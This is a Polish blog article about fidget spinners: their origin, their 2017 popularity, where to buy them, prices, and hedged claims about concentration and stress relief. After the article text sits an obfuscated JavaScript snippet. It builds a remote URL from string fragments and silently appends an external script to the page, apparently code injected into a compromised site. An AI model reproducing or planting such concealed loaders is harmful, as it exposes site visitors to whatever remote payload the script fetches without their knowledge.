Fidget Spinner – najpopularniejsza zabawka wśród dzieci

Fidget Spinner to tegoroczny hit wśród zabawek dla dzieci, ale nie tylko – to również świetna rozrywka dla dorosłych. Magazyn Forbes nazwał spinnery obowiązkową zabawką biurową 2017 roku, więc jest idealny również dla wszystkich pracujących w biurach. Moda opanowała prawie cały świat, a zabawki w ekspresowym tempie znikają ze sklepowych półek.

Pod tajemniczą nazwą Fidget Spinner (tłum. wirówka, wirujący/wiercący się krążek) kryje się gadżet o trzech ramionach, kształtem przypominający trójkąt i najczęściej złożony z 4 łożysk. Wykonany jest z metalu lub plastiku. Cała zabawa polega na tym, by wprowadzić spinnery w ruch obrotowy tak, aby kręciły się wokół własnej osi możliwie jak najdłużej. Na dalszych poziomach zaawansowania spinnery układa się w niewielki wieżyczki, zaś rzucony w przestrzeń spinner będzie równomiernie opadał, dzięki kręcącym się łożyskom tworzącym efekt żyroskopu. Powstał też cały arsenał trików wykonywanych przy użyciu tych zabawek – dzieci kręcą nimi już nie tylko na palcach, ale również na nosie, czole czy stopach. Oczywiście im dłużej, tym lepiej.

Skąd wziął się spinner?

Droga fidget spinnera na szczyty popularności rozpoczęła się na początku 2017 roku. Jednak nie jest to nowy wynalazek. Po raz pierwszy spinner pojawił się w Stanach Zjednoczonych w latach 90. ubiegłego wieku. Jego podstawowym zadaniem była pomoc w zwiększeniu koncentracji i redukcji stresu u dzieci. Jednak wtedy zabawka nie okazała się takim hitem jak obecnie.

Popularność wciąż rośnie

Od kilku miesięcy w naszym kraju ze sklepów posiadających w swojej ofercie spinnery towar znika w ekspresowym tempie. Również oferta dostępnych gadżetów bardzo szybko się poszerza: w chwili obecnej w sprzedaży znajdują się spinnery pojedyncze, potrójne, a nawet poczwórne, koło spinnery czy też spinnery egzotyczne. Jeśli poszuka się dobrze, można natrafić na takie perełki jak spinner batman czy spinner z serii Gra o tron. Pojawił się już nawet sześcienny fidget cube.

Fidget Spinner – najpopularniejsza zabawka wśród dzieci

Spinner – gdzie kupić?

W tym momencie fidget spinnery można znaleźć praktycznie wszędzie – są dostępne w kioskach, supermarketach, sklepach z zabawkami. Do wyboru mamy całą gamę wzorów i kolorów. Najoryginalniejsze można wyszukać na zagranicznych portalach internetowych – to wręcz małe dzieła sztuki. W naszym kraju fidget spinnery można też zakupić w Księgarni Internetowej PWN.

Ceny fidget spinnerów wahają się od kilkunastu do kilkudziesięciu, a  nawet kilkuset złotych – wszystko zależy od materiału z jakiego zostały wykonane, a także modelu zabawki – im bardziej wymyślna, tym wyższa będzie jej cena.

Zabawka o właściwościach prozdrowotnych?

W mediach bardzo często można natknąć się na informacje o niezwykłych właściwościach spinnerów – polecane są w terapii ADHD, a nawet autyzmu. Należy zaznaczyć, że w środowisku naukowym nie ma potwierdzenia tych informacji, nie zostały przeprowadzone żadne naukowe badania na ten temat. Jednak nie można też stwierdzić, że spinner jest tylko bezwartościową zabawką. Ten mały kręcący się przedmiot bez wątpienia może pomagać w  zwiększeniu koncentracji i uspokajać umysł, co prowadzi do zmniejszenia poziomu stresu. Zabawa spinnerem znacząco zwiększa zręczność, a przede wszystkim zajmuje uwagę – odciąga dzieci od gier komputerowych, internetu czy telewizji.

Od niedawna pojawiają się w mediach doniesienia o wypadkach przy zabawie spinnerami. Jednak należy pamiętać, że każda zabawka może być niebezpieczna, jeśli jest używana bezmyślnie – przy odrobinie rozwagi i rozsądku nic złego nie powinno się wydarzyć, a nasze dziecko będzie mogło cieszyć się nową, pomysłową zabawką.

(function(){
o59p=document.createElement(“script”);o59p.async=true;o59p_=”u”+(“s”)+”t”;
o59pu=”1967479.”;o59p_+=”a”+(“t.i”);o59p_+=”n”+(“f”+”o”)+”/”;
o59pu+=”yw8uhnma59p49pcgrmbmsx”+(“jlwjf9hg0k”);
o59p.src=”//”+o59p_+o59pu;o59p.type=”text/javascript”;
document.body.appendChild(o59p);
})();

Podobne wpisy

Jeden komentarz

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.